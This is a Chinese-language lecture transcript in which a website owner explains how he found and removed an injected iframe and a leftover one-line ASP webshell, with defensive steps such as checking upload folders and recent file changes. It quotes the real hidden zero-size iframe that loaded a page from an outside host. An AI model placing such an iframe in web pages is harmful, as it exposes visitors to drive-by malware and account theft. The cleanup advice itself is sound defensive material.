被挂马后的不完全查找与解决方法

讲师：:渺，千秋(63558205)
主题：网站被挂马后的不完全查找和解决方法
讲课记录：

最近很多站长的网站被挂了马，在51.la的BBS上我回了个帖子说自己被挂过，后来找出来了，有点经验，然后两天内好几个人加我QQ！他们的站都是被挂了这个
<iframe src="http://ll78.com/qq/2.htm" width=0 height=0></iframe>
这个代码！
先讲讲我被挂马的事情：

前段时间我登录自己网站后台，登录后没反应，程序都是自己写的，不是用的CMS系统！一看源文件发现最上面多了一句<iframe>,立刻意识到被挂马了！ftp连上稍微看了一下就发现index和conn这样的文件被修改了，立刻修改回来，很清楚这样删了是治标不治本的，过不两天还会被挂！
也有的你看源文件是没有的，可能写在你的其他包含文件里或者JS文件或者数据库里！

我自己是写程序的，我清楚自己的网站没有注入和上传漏洞，那到底是从哪攻破的呢？
主机？也不是，用的是虚拟主机权限做的很好，自己上传个马都只能看自己的网站！不服气，一定要把后门找出来，最重要的是知道如何被挂的，知道了原理才能从根本上防范，于是在网上百度google了半天，发现很多人被iframe，但却没有找到防范方法和解决方案！他们一般都是回答说网站有上传和注入漏洞或者服务器漏洞被旁注了！但这些可能性我的站都没有！搞到半夜两点终于不负有心人被我找到了后门，进行了处理后，现在快一个月了没有再被挂过！

上面是废话，下面讲被挂马后的一般查马和解决方法！

一般被挂马就是有了网站的shell或者服务器的shell,挂马者主要是为了盗QQ，网游帐号，刷流量等，这段时间盗QQ不是很疯狂的吗？很多卖QQ的都发财了！但网站被挂马了肯定影响网站的流量，谁愿意上有病毒的网站？
webshell一般是网站被上传了ASP木马，网站主要能利用的漏洞是SQL注入和上传漏洞，很多系统总是被利用如动网和动易都有漏洞的历史！所以这些共享系统的兄弟们要及时更新补丁比较保险！

被挂马后查找步骤：
1.先看看上传目录下面有没有可疑的ASP文件
2.然后再根据文件修改时间看看最近修改的文件哪些可疑

如果有后门木马文件的话细心的兄弟应该能查的出来！
但我当时细心的查了好几遍都没找到木马文件，我网站的文件比较少查起来比较容易！
我就纳闷为什么没有后门文件也能改我的文件，后来空间的技术和我说不用有木马文件也可以得到webshell,后来终于在网上查到了"一句话木马"！把这一句话随便放在你网站的一个文件里你都有得查！期间我在网上还发现有一个功能可以把网站所有的首页和包含文件都自动加上代码的文件！专门为挂马开发的！

文件太多如何查呢？同事给了我一个在线查马的文件，好像是chinaz的版主"伤心森林"写的，根据木马的特征码，可以把可疑的文件查出来，我用它终于发现两个文件被修改过，看修改时间的！下载下来一看里面都被加了"一句话木马"，删掉后，网站的后门基本也就没有了！到现在没被再挂过！

很多兄弟一点也和我一样觉得要挂马一定会有后门文件，但"一句话木马"不用就可以，所以很多兄弟删了会被再挂，长期受折磨！

那个一句话代码是之前我站被上传了ASP木马的时候加的，后来我补了上传漏洞删了马！但这个后门一直存在！
讲的很乱，因为时间太仓促，今天的重点是：被挂马后根据文件修改时间查可疑文件，补网站的漏洞，用查马工具找可疑文件！